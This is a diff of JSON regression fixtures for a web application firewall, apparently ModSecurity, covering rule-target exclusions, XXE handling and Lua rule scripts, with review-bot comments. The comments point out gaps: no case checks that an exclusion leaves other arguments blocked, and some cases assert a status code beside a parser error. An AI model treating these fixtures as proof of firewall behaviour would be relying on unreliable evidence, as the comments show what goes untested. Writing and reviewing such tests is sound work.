] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/.*y$/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/k.*/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:/ke/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", - "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." 
+ ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", + "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." 
+ ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:ref", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:ref", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] } ] 
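Review bot: Every case in this file expects `"http_code": 200`, so the suite shows that an exclusion suppresses the rule but never that an argument outside the exclusion still reaches the `deny`. A regression that made `SecRuleUpdateTargetByTag` exclude more of `ARGS` than the selector says (for a WAF, a silent gap in coverage) would pass all seven cases. The SecRuleUpdateTargetById file earlier in this diff has a "(no match)" case expecting 403. A counterpart here would use a selector that does not cover the matching argument, for example (constructed, assuming the default deny status) `"SecRuleUpdateTargetByTag test !ARGS:/xxx/"` with `"http_code": 403`. Separately, the last title is numbered `(7/6)`, and titles (5/6) and (6/6) carry the same description although their regexes differ.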
diff --git a/test/test-cases/regression/config-xml_external_entity.json b/test/test-cases/regression/config-xml_external_entity.json index 1f5cf098dc..45031fe3a9 100644 --- a/test/test-cases/regression/config-xml_external_entity.json +++ b/test/test-cases/regression/config-xml_external_entity.json 
@@ -1,26 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 1", - "expected":{ - "debug_log": "Target value: \" jo smith\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 1", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "162" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" + "expected": { + "debug_log": "Target value: \" jo smith\"", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 2", - "expected":{ - "debug_log": "XML: 
Failed to load DTD: test-cases/data/SoapEnvelope.dtd", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 2", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "166" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD 
test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 3", - "expected":{ - "debug_log": "XML Error: No declaration for element bookstore", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 3", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "166" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML Error: No declaration for element bookstore", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + 
"SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] } ] - diff --git a/test/test-cases/regression/debug_log.json b/test/test-cases/regression/debug_log.json index 9e17fac69e..cda25c7d3e 100644 --- a/test/test-cases/regression/debug_log.json +++ b/test/test-cases/regression/debug_log.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -24,33 +24,35 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶2=test2", + "uri": "/test.pl?param1=test¶2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": ".*", - "error_log": "" + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -58,7 +60,6 @@ "SecRule ARGS \"@contains /test.txt\" \"id:4,allow\"", "SecRule ARGS:teste \"@contains /test.txt\" \" id:1,allow,deny\"", "SecRule ARGS \"@contains /test.txt\" \"allow, allow,id:2,deny\"" - ] } ] diff --git a/test/test-cases/regression/directive-sec_rule_script.json b/test/test-cases/regression/directive-sec_rule_script.json index b8eb904759..846fe3d117 100644 --- a/test/test-cases/regression/directive-sec_rule_script.json +++ b/test/test-cases/regression/directive-sec_rule_script.json 
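Review bot: The response `Content-Type` value keeps its trailing `\n\r` (`"text/xml; charset=utf-8\n\r"`) while the `Content-Length` beside it is normalized from `"length\n\r"` to `"384"`. Nothing in this case's `expected` block indicates that an embedded LF/CR in a header value is under test, so it reads as a leftover; `"Content-Type": "text/xml; charset=utf-8",` would match the rest of the cleanup. The same value survives in directive-sec_rule_script.json and issue-1152.json later in this diff. If the control characters are deliberate input for header handling, saying so in the case title would keep a later cleanup from removing them.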
@@ -1,201 +1,214 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (1/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script 'test-cases/data/match" - }, - "rules":[ 
+ "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script 'test-cases/data/match" + }, + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-ops.lua \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (2/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + 
"Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script " - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script " + }, + "rules": [ "SecRuleEngine On", "SecRuleScript /bin/echo \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (3/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; 
Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" + }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"echo 123", - "error_log":"", - "parser_error":"", + "body": [ + "" + ] + }, + "expected": { + "debug_log": "echo 123", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-log.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", 
- "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (4/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"Running \\(disruptive\\) action: deny", - "error_log":"", - "parser_error":"", + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Running \\(disruptive\\) action: deny", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] } ] - diff --git a/test/test-cases/regression/fn-setHostname.json b/test/test-cases/regression/fn-setHostname.json index 59c5b52e8f..8f8d6b2d5f 100644 --- a/test/test-cases/regression/fn-setHostname.json +++ b/test/test-cases/regression/fn-setHostname.json 
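Review bot: Cases (1/4) and (2/4) now assert `"http_code": 200` next to a non-empty `parser_error`. If the harness stops once the rules fail to load (not visible in this hunk), no transaction produces a status. The 200 is then a serializer default rather than a checked expectation, and the fixture reads as if it verified that traffic is allowed when the script fails to compile. Emitting `http_code` only when `parser_error` is absent would keep these two cases limited to what they check.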
